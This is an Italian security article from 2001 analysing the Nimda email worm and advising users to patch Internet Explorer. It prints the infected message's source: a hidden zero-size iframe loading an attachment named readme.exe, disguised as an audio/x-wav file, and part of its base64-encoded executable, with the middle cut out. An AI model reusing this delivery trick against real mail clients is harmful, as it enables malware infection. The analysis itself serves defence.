Dall'archivio articoli > Security & Admin

Speciale W32.Nimda.A@mm, il worm che attacca Windows

Daniele Bochicchio, in Security & Admin, il 19 settembre 2001 alle 08:00

Security

Questo articolo è uno speciale dedicato ad un nuovo virus/worm che colpisce i sistemi dotati di sistema operativo Windows, chiamato Nimda .

La particolarità di questo worm risiede nel fatto che viaggia come allegato ad un'e-mail, in grado di autoeseguirsi visualizzata da Outlook Express 5 o 5.01 senza SP2, infettando il sistema.

Ad una prima analisi del codice sorgente del messaggio, che è mostrato più in basso, si trova una certa analogia con altri worm già presenti. Tenta infatti di eseguire un file che infetterà poi il sistema, mascherando la richiesta come l'esecuzione di un file audio/wav.

Con questo escamotage , difatti, taglia via una fetta significativa di personal firewall, che di norma bloccano l'esecuzione di programmi allegati, non certo di file audio.

Analisi di un attacco

Per inciso, vi basta fare l'upgrade di IE alla versione 5.5 o meglio ancora alle 6 per stare sicuri, oppure applicare il SP ad IE 5.01 perchè siate praticamente al sicuro. Tuttavia, non è difficile che vi venga spontaneo premere su "Apri" (oppure che questa operazione venga fatta da qualcuno degli utenti della vostra LAN che mangari non ha molta dimestichezza con la sicurezza) e che quindi la frittata venga fatta.

 Received: from ...
From: <....>
Subject: desktopdeskto....
MIME-Version: 1.0
Content-Type: multipart/related;
  type="multipart/alternative";
  boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: ...
X-RCPT-TO: ...
Date: ...
X-UIDL: 285007901
Status: U

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
  boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
 <b><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></b> </BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
 <b>Content-Type: audio/x-wav;
  name="readme.exe"</b> 
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAMpUCAEAAAB/UEUAAEwBBQB1Oqc7
[....]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA=

--====_ABC1234567890DEF_====

Contenuti dell'articolo

Commenti

Visualizza/aggiungi commenti

| Condividi su: Twitter, Facebook, LinkedIn

Per inserire un commento, devi avere un account.

Fai il login e torna a questa pagina, oppure registrati alla nostra community.

Speciale W32.Nimda.A@mm, il worm che attacca Windows

Analisi di un attacco

Commenti

Approfondimenti

Evitare (o ridurre) il repo-jacking sulle GitHub Actions

Escludere alcuni file da GitHub Secret Scanning

Garantire la provenienza e l'integrità degli artefatti prodotti su GitHub

Autenticazione di git tramite Microsoft Entra ID in Azure DevOps

Rendere i propri workflow e le GitHub Action utilizzate più sicure

Sommario

Top Ten Articoli

Articoli via e-mail

In primo piano

.NET Conference Italia 2024 - Milano

.NET Conference Italia 2023 - Milano e Online

Le novità di .NET 7 e C# 11

Le novità in ASP.NET Core e Blazor con .NET 7

I più letti di oggi

In evidenza

Misc

Utilizziamo i cookie per analisi, contenuti personalizzati e pubblicità.

Analisi di un attacco